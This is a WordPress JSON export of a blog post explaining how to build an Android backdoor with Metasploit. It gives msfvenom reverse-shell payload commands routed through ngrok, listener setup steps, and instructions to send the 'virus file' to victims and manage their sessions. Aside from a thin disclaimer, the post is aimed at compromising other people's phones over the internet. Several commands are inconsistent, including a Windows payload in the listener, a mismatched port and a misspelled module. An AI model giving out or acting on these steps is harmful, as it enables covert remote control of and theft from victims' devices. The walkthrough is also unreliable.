{"id":1279,"date":"2022-02-25T14:37:27","date_gmt":"2022-02-25T14:37:27","guid":{"rendered":"https:\/\/news4hacker.com\/?p=1279"},"modified":"2023-04-24T08:44:14","modified_gmt":"2023-04-24T08:44:14","slug":"how-to-create-backdoor-in-android","status":"publish","type":"post","link":"https:\/\/reconcybersecurity.com\/blogs\/how-to-create-backdoor-in-android\/","title":{"rendered":"How to create backdoor in Android using Metasploit| Penetration Testing 2023"},"content":{"rendered":"\n<p>In this post, you are going to read about how to create backdoor in Android with Metasploit to hack any android device and control it using our system. This is the second blog on hacking android systems with Metasploit but this time will show you how to do it by making the link with ngrok to hack victims over the internet&#8230;<\/p>\n\n\n\n<p><strong>Disclaimer \u2013 <\/strong>This blog is for educational purposes only How to create backdoor in Android, If you do anything illegal then we are not responsible for it\u2026<\/p>\n\n\n\n<h2 id=\"what-is-metasploit\" class=\"wp-block-heading\">What Is Metasploit?<\/h2>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-1 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:33.33%\">\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"501\" height=\"663\" src=\"https:\/\/reconcybersecurity.com\/blogs\/wp-content\/uploads\/2023\/04\/kindpng_7930031.png\" alt=\"how to create backdoor in android\" class=\"wp-image-11021\" srcset=\"https:\/\/reconcybersecurity.com\/blogs\/wp-content\/uploads\/2023\/04\/kindpng_7930031.png 501w, https:\/\/reconcybersecurity.com\/blogs\/wp-content\/uploads\/2023\/04\/kindpng_7930031-227x300.png 227w, https:\/\/reconcybersecurity.com\/blogs\/wp-content\/uploads\/2023\/04\/kindpng_7930031-380x503.png 380w\" sizes=\"auto, (max-width: 501px) 100vw, 501px\" \/><\/figure>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:66.66%\">\n<p>The <a href=\"https:\/\/www.metasploit.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">Metasploit Framework<\/a> is an open-source powerful tool that is used by CyberCriminals as well as Ethical-Hackers to find systematic vulnerabilities on networks and servers because it can be easily customized and used in most Linux operating systems.<\/p>\n\n\n\n<p>Metasploit came preinstalled in all Linux operating systems like Kali  Linux, Parrot OS, etc. But if you don\u2019t have it then you can install it  by typing (<strong> sudo apt-get install metasploit-framework<\/strong> )\u2026<\/p>\n<\/div>\n<\/div>\n\n\n\n<h2 id=\"how-to-create-backdoor-in-android-using-payload-with-metasploit\" class=\"wp-block-heading\"><strong>How to create backdoor in Android using Payload with <a href=\"https:\/\/reconcybersecurity.com\/blogs\/category\/metasploit\/\" data-type=\"URL\" data-id=\"https:\/\/reconcybersecurity.com\/blogs\/category\/metasploit\/\">Metasploit<\/a>?<\/strong><\/h2>\n\n\n\n<p>So 1st we have to create our ngrok server to use the apk format virus file anywhere. For doing that open the file path of ngrok in the terminal and type this command ( <strong>.\/ngrok tcp 1337<\/strong> )\u2026<\/p>\n\n\n\n<p><strong>Note \u2013 <\/strong>Read and type all commands very carefully because if you type a single wrong command then the Metasploit will not work\u2026<\/p>\n\n\n\n<p>Open another terminal for create backdoor in android and write this payload<\/p>\n\n\n\n<p>command :- <strong>msfvenom -p android\/meterpreter\/reverse_tcp lhost=(YOUR NGROK LINK) lport=(YOUR NGROK PORT) -o filename<\/strong> ). See the photo for a better understanding\u2026<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2022\/02\/Screenshot_20220225_195952.png\" alt=\"\" class=\"wp-image-1290\"\/><\/figure>\n\n\n\n<p><strong>Remember \u2013<\/strong> You have to copy ngrok link from after double slash ( <strong>\/\/<\/strong> ) till ( <strong>.io<\/strong> ) to paste it in lhost.<\/p>\n\n\n\n<p>After that, you can see a ZIP file in your home directory which is also your virus. Now we have to create our listener which will help us to control our victim\u2019s system\u2026<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2022\/02\/Screenshot_20220225_193942-1024x391.png\" alt=\"\" class=\"wp-image-1291\"\/><\/figure>\n\n\n\n<p><strong>Follow the commands below to create the Listener: &#8211; <\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>msfconsole<\/code><\/li>\n\n\n\n<li><code>use expliot\/multi\/handler<\/code><\/li>\n\n\n\n<li><code>set payload windows\/x64\/meterpreter\/reverse_tcp<\/code><\/li>\n\n\n\n<li><code>set lhost 0.0.0.0<\/code><\/li>\n\n\n\n<li><code>set lport 4242<\/code><\/li>\n\n\n\n<li><code>exploit<\/code><\/li>\n<\/ul>\n\n\n\n<p>Now everything is done, just send your virus file to your target and if he\/she will open it then we will get remote access to their Android\u2026<\/p>\n\n\n\n<p>First, type ( <strong>background<\/strong> ) command after gaining the access to the system. It will help us to stay connected to our victim&#8217;s device even if you start the Metasploit session again after closing it&#8230;<\/p>\n\n\n\n<p>If you want to connect again with the victim so type ( <strong>sessions<\/strong> ) for viewing how many connections you have then type ( <strong>sessions -i &lt;Victim session no.&gt;<\/strong> ) for connecting again&#8230;<\/p>\n\n\n\n<p>Now you can do whatever you want with the victim&#8217;s device but without harming them. If you want a video on Full Metasploit Tutorial so you can comment us down&#8230;<\/p>\n\n\n\n<p>If you want to learn more about Metasploit so you can check our other blogs on it \u2013 https:\/\/reconcybersecurity.com\/blog\/category\/metasploit\/<\/p>\n\n\n\n<p><strong>Tips \u2013<\/strong> You can type the ( <strong>help<\/strong> ) command in Metasploit for viewing all commands after hacking the victim\u2019s windows\u2026<\/p>\n\n\n\n<p class=\"has-text-align-center\"><strong>If you have any problem with our blog so you can comment to us we will try to fix it.<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-right\">&#8211; Recon <\/p>\n","protected":false},"excerpt":{"rendered":"In this post, you are going to read about how to create backdoor in Android with Metasploit to&hellip;\n","protected":false},"author":1,"featured_media":10842,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[92],"tags":[195,196,90,197],"class_list":{"0":"post-1279","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-metasploit","8":"tag-backdoor-with-metasploit","9":"tag-hack-android-over-the-internet","10":"tag-how-to-use-metasploit","11":"tag-make-backdoor-in-android-using-metasploit"},"_links":{"self":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts\/1279","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/comments?post=1279"}],"version-history":[{"count":3,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts\/1279\/revisions"}],"predecessor-version":[{"id":11025,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts\/1279\/revisions\/11025"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/media\/10842"}],"wp:attachment":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/media?parent=1279"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/categories?post=1279"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/tags?post=1279"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}